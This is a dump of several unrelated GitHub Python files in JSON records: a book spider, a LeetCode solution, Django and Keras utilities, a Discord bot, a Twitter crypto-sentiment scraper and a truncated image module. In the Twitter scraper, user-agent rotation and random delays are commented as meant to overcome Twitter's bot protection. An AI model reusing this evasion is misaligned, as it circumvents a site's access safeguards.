urljoin(response.url,href)\n\t\t\tnames.add(name)\n\t\t\tmeta = {}\n\t\t\tmeta['name'] = name\n\t\t\tmeta['bid'] = old['bid']\n\t\t\tmeta['size'] = 0\n\t\t\tmeta['is_vip'] = 1\n\t\t\tmeta['prev_cid'] = 0\n\t\t\tmeta['next_cid'] = 0\n\t\t\tmeta['sequence'] = j\n\t\t\tj = j+1\n\t\t\tself.logger.info('Parse url is %s', url)\n\t\t\tchapter_id = mysql.insert(meta);\n\t\t\tmeta['chapter_id'] = chapter_id\n\t\t\tif old['other'] == True:\n\t\t\t\tmeta['id'] = old['id']+href.replace('.html','')\n\t\t\telse:\n\t\t\t\tmeta['id'] = old['id']\n\t\t\tself.logger.info('chapter_id is ------------------%s',chapter_id)\n\t\t\tyield scrapy.Request(url,callback=self.parse2,meta=meta)\n\t\tmysql.close();\n\t\n\tdef parse2(self,response):\n\t\told = response.meta\n\t\tself.logger.info('parse2 parse2 parse2 parse2 parse2------------------')\n\t\tself.logger.info(response.status)\n\t\tself.logger.info('parse2 function called on dfsdfsd------------------%s',response.url)\n\t\tstr = response.xpath('//*[@id=\"'+old['id']+'\"]/text()').extract()\n\t\tif not str:\n\t\t\tstr = response.xpath('//*[@id=\"'+old['id']+'\"]/p/text()').extract()\n\t\tdata = \tresponse.meta\n\t\tdata['content'] = \"\\r\\n\".join(str)\n\t\tyield data\n\t\t","repo_name":"toosin/book_craw","sub_path":"books/spiders/booke.py","file_name":"booke.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69799914436","text":"\"\"\"\n Course Schedule\n\n There are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.\n\n Some courses may have prerequisites, for example to take course 0 you have to first take course 1, which is expressed as a pair: [0,1]\n\n Given the total number of courses and a list of prerequisite pairs, is it possible for you to finish all courses?\n\n Example 1:\n Input: numCourses = 2, prerequisites = [[1,0]]\n Output: true\n Explanation: There are a total of 2 courses to take. \n To take course 1 you should have finished course 0. So it is possible.\n\n Example 2:\n Input: numCourses = 2, prerequisites = [[1,0],[0,1]]\n Output: false\n Explanation: There are a total of 2 courses to take. \n To take course 1 you should have finished course 0, and to take course 0 you should\n also have finished course 1. So it is impossible.\n \n\n Constraints:\n * The input prerequisites is a graph represented by a list of edges, not adjacency matrices. Read more about how a graph is represented.\n * You may assume that there are no duplicate edges in the input prerequisites.\n * 1 <= numCourses <= 10^5\n\"\"\"\n\nclass Solution:\n def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:\n \n graph = collections.defaultdict(list)\n \n V = numCourses\n \n for u, v in prerequisites:\n graph[v].append(u)\n \n visited = [0] * V\n \n def isCycle(node):\n if visited[node] == 1:\n return True\n if visited[node] == 0:\n \n visited[node] = 1\n \n for neighbour in graph[node]:\n if isCycle(neighbour):\n return True\n \n visited[node] = 2\n \n return False\n \n \n for node in range(V):\n if visited[node] == 0:\n if isCycle(node):\n return False\n \n return True","repo_name":"bugsanderrors/MayLeetCodingChallenge","sub_path":"W5Q1.py","file_name":"W5Q1.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32468304343","text":"# pylint: disable=R0903\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nimport pytz\n\n__all__ = ['TimezoneMiddleware']\n\n\nclass TimezoneMiddleware:\n \"\"\"\n Activate user's timezone if user has timezone field.\n\n add this manually to your `MIDDLEWARE` list:\n\n # settings/base.py\n\n MIDDLEWARE += [\n 'vb_baseapp.middlewares.TimezoneMiddleware',\n ]\n\n Note:\n\n This middleware will be more helpfull if you use custom User model\n with `timezone` field. Check `django-timezone-field` package!\n\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n tzname = settings.TIME_ZONE\n if request.user.id and getattr(request.user, 'timezone', None):\n tzname = request.user.timezone\n timezone.activate(pytz.timezone(tzname))\n\n response = self.get_response(request)\n return response\n","repo_name":"vbyazilim/django-vb-baseapp","sub_path":"vb_baseapp/middlewares/timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15889737439","text":"import importlib.util\n\nfrom typing import Any, Iterable, Mapping, NamedTuple, Optional, Sequence, Union\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom .models.data_format import DataFormat\nfrom . import utilities\n\n\ndef _load_module(file_path, name):\n spec = importlib.util.spec_from_file_location(name=name, location=file_path)\n module = importlib.util.module_from_spec(spec=spec)\n\n spec.loader.exec_module(module)\n\n return module\n\n\ndef _iterate_tensors(tensors: Union[tf.Tensor, Iterable[tf.Tensor]]):\n yield tensors\n\n\ndef _get_data_format(tensor: tf.Tensor):\n layer = getattr(tensor, '_keras_history')[0]\n data_format = None\n\n for node in getattr(layer, '_outbound_nodes'):\n if tensor in _iterate_tensors(node.input_tensors):\n outbound_layer = node.outbound_layer\n\n try:\n keras_data_format = outbound_layer.data_format\n except AttributeError:\n continue\n\n if keras_data_format == 'channels_first':\n if data_format is None:\n data_format = DataFormat.CHANNELS_FIRST\n elif data_format == DataFormat.CHANNELS_LAST:\n return None\n else:\n if data_format is None:\n data_format = DataFormat.CHANNELS_LAST\n elif data_format == DataFormat.CHANNELS_FIRST:\n return None\n\n return data_format\n\n\ndef get_custom_objects(file_path):\n module_name = ''\n custom_objects = {}\n module = _load_module(file_path, module_name)\n\n for name, value in vars(module).items():\n if isinstance(value, type) and issubclass(value, keras.layers.Layer) and value.__module__ == module_name:\n custom_objects[name] = value\n\n return custom_objects\n\n\nclass NodeSpec(NamedTuple):\n layer_name: str\n node_index: int = 0\n\n @staticmethod\n def from_str(value: str) -> 'NodeSpec':\n groups = value.split(':')\n\n if len(groups) == 1:\n node_index = 0\n elif len(groups) == 2:\n node_index = int(groups[1])\n else:\n raise ValueError\n\n return NodeSpec(layer_name=groups[0], node_index=node_index)\n\n\ndef _get_node_specs(values: Optional[Iterable[str]]):\n return utilities.map_optional(values, lambda value: list(map(NodeSpec.from_str, value)))\n\n\ndef get_inputs(model: keras.Model, input_specs: Optional[Sequence[NodeSpec]]):\n if input_specs is None:\n return [(tensor, _get_data_format(tensor)) for tensor in model.inputs]\n\n return [(tensor, _get_data_format(tensor))\n for input_spec in input_specs\n for tensor in _iterate_tensors(model.get_layer(input_spec.layer_name).get_input_at(input_spec.node_index))]\n\n\ndef get_outputs(model: keras.Model, input_specs: Optional[Sequence[NodeSpec]]):\n if input_specs is None:\n return model.outputs\n\n return [\n tensor\n for input_spec in input_specs\n for tensor in _iterate_tensors(model.get_layer(input_spec.layer_name).get_output_at(input_spec.node_index))\n ]\n\n\nclass Config(NamedTuple):\n input_nodes: Optional[Sequence[NodeSpec]] = None\n output_nodes: Optional[Sequence[NodeSpec]] = None\n max_batch_size: Optional[int] = None\n need_search_schedule: Optional[bool] = None\n target: Optional[str] = None\n\n @staticmethod\n def from_json(value: Mapping[str, Any]) -> 'Config':\n return Config(input_nodes=_get_node_specs(value.get('input_layer_names')),\n output_nodes=_get_node_specs(value.get('output_layer_names')),\n max_batch_size=value.get('max_batch_size'),\n target=value.get('target'),\n need_search_schedule=value.get('need_search_schedule'))\n\n @staticmethod\n def from_env(env: Mapping[str, str]) -> 'Config':\n return Config(input_nodes=_get_node_specs(utilities.split_by(env.get('INPUT_LAYER_NAMES'), ',')),\n output_nodes=_get_node_specs(utilities.split_by(env.get('OUTPUT_LAYER_NAMES'), ',')),\n max_batch_size=utilities.map_optional(env.get('MAX_BATCH_SIZE'), int),\n target=env.get('TARGET'),\n need_search_schedule=env.get('NEED_SEARCH_SCHEDULE') in ['True', 'true', 'TRUE'] if\n env.get('NEED_SEARCH_SCHEDULE') else None)\n","repo_name":"Adlik/Adlik","sub_path":"model_compiler/src/model_compiler/keras_util.py","file_name":"keras_util.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"61"} +{"seq_id":"31980612656","text":"import string\n\nimport discord\nfrom discord.ext import commands\nfrom TimeConversion import DataOut as DataOut\n\n\nclass EmbedBot:\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n async def bot_embed(self, channel, description, url, icon_url, footer_text):\n embed = discord.Embed(description=description, color=0x00ffffff)\n embed.set_thumbnail(url=url)\n embed.set_footer(text=footer_text, icon_url=icon_url)\n await channel.send(embed=embed)\n\n async def embed_top(self, top_game, guild, url, description, footer_text, date=None, bot=None):\n\n icon_url = 'https://cdn.onlinewebfonts.com/svg/download_378989.png'\n description = self.description(description, date)\n description = self.description_time(top_game, description, bot)\n category = guild.categories[0]\n channel = category.channels[0]\n await self.bot_embed(channel, description, url, icon_url, footer_text)\n\n async def embed_user(self, top_game, ctx, url, description, footer_text, date=None, bot=None):\n icon_url = 'https://cdn.onlinewebfonts.com/svg/download_378989.png'\n description = self.description(description, date)\n description += self.description_time(top_game, bot)\n footer_text = self.footer_text(top_game, footer_text)\n await self.bot_embed(ctx, description, url, icon_url, footer_text)\n\n def description(self, description, date):\n if date is not None:\n description += f' {date} \\n'\n elif date is None:\n description += f'\\n'\n return description\n\n def description_time(self, top_game, bot):\n tg = DataOut()\n description: string = ''\n for i in top_game:\n tg.time_update(i[1])\n if bot:\n description += f'\\t{bot.get_user(i[0]).display_name} - '\n elif bot is None:\n description += f'\\t{i[0]} - '\n description += f'{tg.output_days(True)}, '\n description += f'{tg.output_hours(True)}, '\n description += f'{tg.output_minutes(True)}\\n'\n return description\n\n def footer_text(self, top_game, footer_text):\n tg = DataOut()\n if footer_text is None:\n all_tg = 0\n for i in top_game:\n all_tg += i[1]\n tg.time_update(all_tg)\n footer_text = f'{tg.output_days(True)}, '\n footer_text += f'{tg.output_hours(True)}, '\n footer_text += f'{tg.output_minutes(True)}\\n'\n return footer_text\n","repo_name":"KrestyaninovIvan/DiscordBOT","sub_path":"bot/embedbot.py","file_name":"embedbot.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14006253243","text":"import json\nimport random\nimport time\nimport urllib\nfrom datetime import datetime, timedelta\n\nimport bs4\nimport psycopg2\nimport requests\n\n# URLS to get Twitter search results\nTWITTER_SEARCH_URL = 'https://twitter.com/search?q={0}&src=typd&qf=off&l=en'\nTWITTER_SEARCH_MORE_URL = 'https://twitter.com/i/search/timeline?q={0}&src=typd&vertical=default&include_available_features=1&include_entities=1&qf=off&l=en&max_position={1}'\n\n# URLs to get Twitter user timeline.\nTWITTER_USER_URL = 'https://twitter.com/{0}'\nTWITTER_USER_MORE_URL = 'https://twitter.com/i/profiles/show/{0}/timeline/tweets?include_available_features=1&include_entities=1&max_position={1}'\n\n# Different user-agent values to try to overcome bot protection.\nuser_agent_pool = [\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',\n 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'\n]\n\n# Different timeouts to try to overcome bot detection.\ntimeout_pool_s = [1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5]\n\n# Save IDs from database for Currency and Media models.\ncurrency_id_by_ticker = {\n 'BTC': 1,\n 'ETH': 2,\n 'LTC': 3,\n 'GENERAL': 4\n}\nmedia_id_by_ticker = {\n 'Twitter': 1,\n 'Reddit': 2,\n 'Cnbc': 3,\n 'Forbes': 4,\n 'Coindesk': 5,\n 'Cointelegraph': 6,\n 'Ccn': 7,\n}\n\n# Default values for sentiment, predictions and trends which identify uninitialized data.\nDEFAULT_SENT_SCORE = 100.0\n\n\nclass Tweet(object):\n \"\"\"Representation of a single tweet from Twitter\"\"\"\n\n def __init__(self, **params):\n self.currencyId_id = params['currencyId_id']\n self.mediaId_id = params['mediaId_id']\n self.tweet_id = params['tweet_id']\n self.content = params['tweet_content']\n self.likes = params['favorite_cnt']\n self.retweets = params['retweet_cnt']\n self.replies = params['reply_cnt']\n self.link = params['tweet_link']\n self.date = params['timestamp']\n self.textblobscore = params['textblobscore']\n self.vaderscore = params['vaderscore']\n self.customclfscore = params['customclfscore']\n\n def jsonify(self):\n return {\n 'currencyId_id': self.currencyId_id,\n 'mediaId_id': self.mediaId_id,\n 'tweet_id': self.tweet_id,\n 'content': self.content,\n 'likes': self.likes,\n 'retweets': self.retweets,\n 'replies': self.replies,\n 'link': self.link,\n 'date': self.date,\n 'textblobscore': self.textblobscore,\n 'vaderscore': self.vaderscore,\n 'customclfscore': self.customclfscore,\n }\n\n def __repr__(self):\n return \"Tweet {0}\".format(\" \".join([self.tweet_id, self.date.strftime(\"%m/%d/%Y, %H:%M:%S\")]))\n\n\nclass TwitterTimelineParser(object):\n \"\"\"Class to hold tools for parsing Twitter timeline into a list of main.scrape_twitter.Tweet instances\"\"\"\n\n def parse_tweets_timeline(self, timeline_html, currencyId_id):\n tweets = []\n soup = bs4.BeautifulSoup(timeline_html, \"lxml\")\n for tweet_tag in soup.find_all(\"div\", class_=\"tweet\"):\n # Find tweet ID.\n tweet_id = tweet_tag['data-tweet-id']\n # Find content of the tweet.\n tweet_content = tweet_tag.find('p', class_='tweet-text').text\n # Find emojis\n emojis_tags = tweet_tag.find('p', class_='tweet-text').find_all(class_='Emoji')\n tweet_content += \" \" + \" \".join(emoji_tag['alt'] for emoji_tag in emojis_tags)\n # Find favorites, likes and replies cnt.\n tweet_tag_footer_div = tweet_tag.find('div', class_='stream-item-footer')\n favorite_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'favorite')\n retweet_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'retweet')\n reply_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'reply')\n # Find tweet link.\n tweet_link = 'twitter.com{0}'.format(tweet_tag['data-permalink-path'])\n # Find tweet posting timestamp.\n timestamp_unixlike = tweet_tag.find('span', class_='_timestamp')['data-time']\n timestamp = datetime.utcfromtimestamp(int(timestamp_unixlike))\n # Create Tweet class instance to save.\n tweet_instance = Tweet(\n currencyId_id=currencyId_id,\n mediaId_id=media_id_by_ticker['Twitter'],\n tweet_id=tweet_id,\n tweet_content=tweet_content,\n favorite_cnt=favorite_cnt, retweet_cnt=retweet_cnt, reply_cnt=reply_cnt,\n tweet_link=tweet_link,\n timestamp=timestamp,\n textblobscore=DEFAULT_SENT_SCORE,\n vaderscore=DEFAULT_SENT_SCORE,\n customclfscore=DEFAULT_SENT_SCORE\n )\n # Save Tweet class instance.\n tweets.append(tweet_instance)\n return tweets\n\n @staticmethod\n def find_tweet_cnt_stats(tweet_footer_html, stats_type):\n if stats_type not in ['reply', 'retweet', 'favorite']:\n raise ValueError('Incorrect stats_type value')\n stats_span = tweet_footer_html.find(\n 'span', class_='ProfileTweet-action--{0}'.format(stats_type))\n stats_span_value = stats_span.find(\n 'span', class_='ProfileTweet-actionCount')['data-tweet-stat-count']\n return stats_span_value\n\n\nclass TwitterScraper(object):\n \"\"\"Implementation of scraping Twitter search page and user page timelines\n \n scrape_search_timeline - use it for hashtag and keyword searching\n scrapes ~500 tweets\n\n scrape_userpage_timeline_adv_search - use it when you know the username\n but want only a portion of it's tweets filtered by date.\n Works poorly for long-term search.\n Use it only for 1-2 day range.\n scrapes ~120 tweets for realdonaldtrump and ~50 for WhaleDump\n\n scrape_userpage_timeline - best for getting last tweets from user.\n scrapes ~700-800 tweets\n \"\"\"\n\n def __init__(self):\n self._timeline_parser = TwitterTimelineParser()\n\n def scrape_search_timeline(self, search_query, currencyId_id):\n # Build a search query.\n search_query = \"{0}\".format(search_query)\n search_query = urllib.parse.quote(search_query)\n # Start scraping search results page timeline.\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id):\n yield tweet_bunch\n\n def scrape_search_timeline_adv_search(self, search_query, from_datetime, to_datetime, currencyId_id):\n # Build a search query.\n search_query = \"{0} since:{1} until:{2}\".format(\n search_query,\n from_datetime.strftime(\"%Y-%m-%d\"), to_datetime.strftime(\"%Y-%m-%d\")\n )\n search_query = urllib.parse.quote(search_query)\n # Start scraping search results page timeline.\n is_keyword_search = True\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id, is_keyword_search):\n yield tweet_bunch\n\n def scrape_userpage_timeline(self, username):\n \"\"\"Please note, that this method could scrape only around 800 last tweets from user page\n This method should be used as a faster approach to scrape selected users's tweets.\n \"\"\"\n # Start scraping user page timeline.\n currencyId_id = currency_id_by_ticker['GENERAL']\n for tweet_bunch in self._scrape_timeline(TWITTER_USER_URL, TWITTER_USER_MORE_URL, username, currencyId_id):\n yield tweet_bunch\n\n def scrape_userpage_timeline_adv_search(self, from_username, from_datetime, to_datetime):\n # Build a search query.\n search_query = \"from:{0} since:{1} until:{2}\".format(\n from_username,\n from_datetime.strftime(\"%Y-%m-%d\"), to_datetime.strftime(\"%Y-%m-%d\")\n )\n search_query = urllib.parse.quote(search_query)\n # Start scraping user's tweets by using advanced search.\n currencyId_id = currency_id_by_ticker['GENERAL']\n adv_search = True\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id, adv_search):\n yield tweet_bunch\n\n def _scrape_timeline(self, first_page_url, more_page_url, main_term, currencyId_id, adv_search=False, is_keyword_search=False):\n # Perform scraping on the first page.\n first_page_tweets_bunch, next_position = self._scrape_first_page(first_page_url, main_term, currencyId_id)\n yield first_page_tweets_bunch\n # Perform scraping on the other pages.\n for nth_page_tweets_bunch in self._scrape_more_pages(more_page_url, main_term, next_position, adv_search, currencyId_id, is_keyword_search):\n yield nth_page_tweets_bunch\n\n def _scrape_first_page(self, first_page_url, main_term, currencyId_id):\n # Request timeline's 1st page data.\n request_url = first_page_url.format(main_term)\n USER_AGENT = random.choice(user_agent_pool)\n response = requests.get(request_url, headers={'User-agent': USER_AGENT})\n response_text = response.text\n # Scrape tweets from the 1st page.\n first_page_parsed_tweets = self._timeline_parser.parse_tweets_timeline(response_text, currencyId_id)\n # Find next position argument for the next timeline page.\n next_position = self._find_arg_value(response_text, \"data-min-position\")\n # Mandatory sleep.\n time.sleep(timeout_pool_s[0])\n return first_page_parsed_tweets, next_position\n\n def _scrape_more_pages(self, more_page_url, main_term, next_position, adv_search, currencyId_id, is_keyword_search):\n # Vars-helpers for the method\n old_next_position = None\n has_more_items = True # because bool(next_position) = True\n # Loop while more pages available. Any issue - request data again with the same next_position param.\n while has_more_items:\n try:\n # Request timeline data from Nth page.\n request_url = more_page_url.format(main_term, next_position)\n USER_AGENT = random.choice(user_agent_pool)\n response = requests.get(request_url, headers={'User-agent': USER_AGENT})\n response_text = response.text\n response_dict = json.loads(response_text)\n # Scrape tweets from the Nth page.\n nth_page_parsed_tweets = self._timeline_parser.parse_tweets_timeline(response_dict['items_html'], currencyId_id)\n # Get next_position value for the N+1th page.\n next_position = response_dict.get('min_position', None)\n yield nth_page_parsed_tweets\n # Check if N+1th page exists. If not - exit the function.\n has_more_items = old_next_position != next_position\n if is_keyword_search:\n if not has_more_items:\n break\n if not response_dict['has_more_items']:\n if not has_more_items:\n break\n if adv_search:\n break\n # Save old_next_position for the next N+1th page existence check.\n old_next_position = next_position\n # Sleep for 1-5s before the next request.\n sleep_time = random.choice(timeout_pool_s)\n time.sleep(sleep_time)\n except Exception:\n break\n\n @staticmethod\n def _find_arg_value(html, value):\n start_pos = html.find(value) + len(value)\n start_pos += 2 # skip = and \" characters.\n end_pos = html.find('\"', start_pos)\n return html[start_pos:end_pos]\n\n\nclass TwitterScraperPerformer(object):\n\n def __init__(self):\n # DB connection and cursor instances.\n self.conn = psycopg2.connect()\n self.cur = self.conn.cursor()\n # Saved list of tweets IDs from DB.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Twitter scrapper instance.\n self.twitter_scraper = TwitterScraper()\n # Selected Twitter usernames and hashtags to scrape.\n self.usernames = [\n 'VitalikButerin', 'SatoshiLite', 'aantonop', 'ErikVoorhees', 'brian_armstrong', 'cz_binance', 'saifedean', # influencers\n 'binance', 'bitmexdotcom', 'bitfinex', 'coinbase', 'cex_io', 'krakenfx', # cryptocurrency exchanges\n 'bitmexresearch', 'wizsecurity', 'proofofresearch', # research pages\n 'VentureCoinist', 'notsofast', 'Cryptopia_NZ', 'BTC_Revolution', 'FelixOHartmann', 'CryptoMoshing', 'cryptotraderpro', # cryptocurrency traders\n 'bitcoin', 'ethereum', 'litecoin', # \"official\" cryptocurrency accounts\n ]\n # Initialize hashtags, tags and keywords to scrape\n self.ticker_hashtags_tags = {\n 'BTC': [\"#btc\", \"#Bitcoin\", \"$btc\"],\n 'ETH': [\"#eth\", \"#Ethereum\", \"$eth\"],\n 'LTC': ['#ltc', \"#Litecoin\", \"$ltc\"],\n 'GENERAL': ['#cryptocurrency', \"#crypto\"]\n }\n # The earliest date to scrape.\n self.earliest_date = datetime(2016, 1, 1)\n\n def scrape_last_updated_data(self):\n # Update local storage of already saved tweets.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Container to save new scraped data.\n data_container = []\n # Perform scraping by date range.\n # 1. Perform scraping by username.\n for username in self.usernames:\n for tweet_bunch in self.twitter_scraper.scrape_userpage_timeline(username):\n skip_user = False\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n skip_user = True\n break\n if skip_user is True:\n print('DBG: skip user {0}\\n'.format(username))\n break\n # Update local storage of existing tweets ids.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # 2. Perform scraping by keywords.\n for ticker, search_terms in self.ticker_hashtags_tags.items():\n currencyId_id = currency_id_by_ticker[ticker]\n for search_term in search_terms:\n for tweet_bunch in self.twitter_scraper.scrape_search_timeline(search_term, currencyId_id):\n skip_search_term = False\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n skip_search_term = True\n break\n if skip_search_term is True:\n print('DBG: skip search term {0}\\n'.format(search_term))\n break\n # Return data and status for webpage view.\n return {\n 'status': 'OK',\n 'data': data_container\n }\n\n def scrape_date_range_data(self, from_date, to_date):\n # Check if from_date is no older than the earliest date allowed.\n if from_date < self.earliest_date:\n from_date = self.earliest_date\n # Update local storage of already saved tweets.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Container to save new scraped data.\n data_container = []\n # Perform scraping by date range.\n # 1. Perform scraping by username.\n for username in self.usernames:\n print('Start scraping {0}\\n'.format(username))\n for tweet_bunch in self.twitter_scraper.scrape_userpage_timeline_adv_search(username, from_date, to_date):\n print('Go to next bunch for {0}\\n'.format(username))\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n print('continue {0}\\n'.format(username))\n continue\n # Update local storage of existing tweets ids.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # 2. Perform scraping by keywords.\n for ticker, search_terms in self.ticker_hashtags_tags.items():\n currencyId_id = currency_id_by_ticker[ticker]\n for search_term in search_terms:\n print('Start scraping {0}\\n'.format(search_term))\n for tweet_bunch in self.twitter_scraper.scrape_search_timeline_adv_search(search_term, from_date, to_date, currencyId_id):\n print('Go to next bunch for {0}\\n'.format(search_term))\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n print('continue {0}\\n'.format(search_term))\n continue\n # Return data and status for webpage view.\n return {\n 'status': 'OK',\n 'data': data_container\n }\n\n def get_last_tweets(self, n_tweets):\n select_query = \"\"\"SELECT * FROM main_twittermedia ORDER BY date DESC LIMIT %s;\"\"\"\n select_query_fields = (n_tweets, )\n self.cur.execute(select_query, select_query_fields)\n tweets_data_from_db = self.cur.fetchall()\n tweets = [self._tweet_jsonify_from_db(tweet) for tweet in tweets_data_from_db]\n return tweets\n\n @staticmethod\n def _tweet_jsonify_from_db(row):\n return Tweet(\n tweet_content=row[1],\n favorite_cnt=row[2],\n retweet_cnt=row[3],\n reply_cnt=row[4],\n tweet_link=row[5],\n timestamp=row[6],\n textblobscore=row[7],\n vaderscore=row[8],\n customclfscore=row[9],\n currencyId_id=row[10],\n mediaId_id=row[11],\n tweet_id=row[12]\n )\n\n def _get_existing_tweets_ids(self):\n # Save Tweet IDs\n self.cur.execute(\"\"\"select tweet_id from main_twittermedia;\"\"\")\n existing_tweets_fromdb = self.cur.fetchall()\n existing_tweets_ids = [row[0] for row in existing_tweets_fromdb]\n return existing_tweets_ids\n\n def _save_tweet(self, tweet):\n insert_query = \"\"\"\n INSERT INTO main_twittermedia\n (\"mediaId_id\", \"currencyId_id\", tweet_id, content, likes, retweets, replies, link, date, textblobscore, vaderscore, customclfscore)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n insert_query_fields = (\n tweet.mediaId_id, tweet.currencyId_id,\n tweet.tweet_id,\n tweet.content,\n tweet.likes, tweet.retweets, tweet.replies,\n tweet.link,\n tweet.date,\n tweet.textblobscore, tweet.vaderscore, tweet.customclfscore\n )\n self.cur.execute(insert_query, insert_query_fields)\n self.conn.commit()\n print('DBG INSERT: inserted {0}'.format(tweet))\n\n\ndef __dbg():\n ts = TwitterScraper()\n from_date = datetime(2018, 5, 29)\n to_date = datetime(2018, 5, 30)\n general_currencyId_id = currency_id_by_ticker['GENERAL']\n btc_currencyId_id = currency_id_by_ticker['BTC']\n tweets_container = []\n # for tweet_bunch in ts.scrape_search_timeline('#bitcoin', btc_currencyId_id):\n # for tweet_bunch in ts.scrape_search_timeline_adv_search(\"#bitcoin\", from_date, to_date, btc_currencyId_id):\n # for tweet_bunch in ts.scrape_userpage_timeline_adv_search('WhalePanda', from_date, to_date):\n for tweet_bunch in ts.scrape_userpage_timeline('notsofast'):\n tweets_container.extend(tweet_bunch)\n\n\ndef __dbg_db():\n from_date = datetime(2018, 5, 29)\n to_date = datetime(2018, 5, 30)\n tsp = TwitterScraperPerformer()\n resp = tsp.scrape_last_updated_data()\n resp = tsp.scrape_date_range_data(from_date, to_date)\n\n\ndef __dbg_get():\n tsp = TwitterScraperPerformer()\n data = tsp.get_last_tweets(20)\n print(data)\n\n\ndef __dbg_truncate_db():\n try:\n conn = psycopg2.connect()\n cur = conn.cursor()\n cur.execute(\"\"\"TRUNCATE TABLE main_twittermedia;\"\"\")\n conn.commit()\n print('Successfully truncated main_twittermedia')\n except (Exception, psycopg2.Error) as e:\n print('Couldn\\'t truncate main_twittermedia table. Error: {0}'.format(e))\n\n\ndef __historical_big_date_range():\n tsp = TwitterScraperPerformer()\n date_from = datetime(2019, 1, 1)\n date_to = datetime.now()\n while date_from < date_to:\n date_from_plus_1d = date_from + timedelta(days=1)\n tsp.scrape_date_range_data(date_from, date_from_plus_1d)\n date_from = date_from_plus_1d\n","repo_name":"maksymhonchar/KPI","sub_path":"year_4/crypto-sentiment-app/django-app/main/scrapers/scrape_twitter.py","file_name":"scrape_twitter.py","file_ext":"py","file_size_in_byte":21670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33391393918","text":"from setuptools import setup, find_packages\nfrom typing import List\n\nHYPEN_E_DOT = '-e .'\ndef get_requirements(file_path:str)->List[str]:\n '''\n this function will return the list of required packages\n '''\n with open(file_path) as f:\n requirements = f.read().splitlines()\n\n if HYPEN_E_DOT in requirements:\n requirements.remove(HYPEN_E_DOT)\n\n return requirements\n\nsetup (\n name='mlproject',\n version='0.0.1',\n author='Shyam',\n author_email='shyam001mukherjee@gmail.com',\n packages=find_packages(),\n install_requires=get_requirements('requirements.txt')\n\n )","repo_name":"shyam001mukherjee/mlproject","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40785025767","text":"import torch\nimport torchvision.transforms as T\nfrom PIL import Image, ImageFilter\nfrom torch import nn\n\nfrom sips.utils.keypoint_matching import unravel_index\n\n\ndef image_to_tensor(\n im: Image.Image, im_shape: tuple[int, int] = (512, 512)\n) -> torch.Tensor:\n \"\"\"\n Transform PIL Image to torch tensor\n\n Parameters\n ----------\n im : Image.Image\n input image\n im_shape : tuple[int, int], optional\n shape of the input image, by default (512, 512)\n\n Returns\n -------\n torch.Tensor\n resulting tensor\n \"\"\"\n transform = T.Compose([T.PILToTensor(), T.Resize(im_shape, antialias=True)]) # type: ignore[mypy]\n return transform(im) # type: ignore[mypy]\n\n\ndef blur_image(im: Image.Image) -> Image.Image:\n return im.filter(ImageFilter.BLUR)\n\n\ndef find_bright_spots(im: torch.Tensor, conv_size=8, bs_threshold=210) -> torch.Tensor:\n \"\"\"\n Find pixels that are brighter than threshold. Only keep one per 8x8\n grid. Return as uv coordinates\n\n Parameters\n ----------\n im 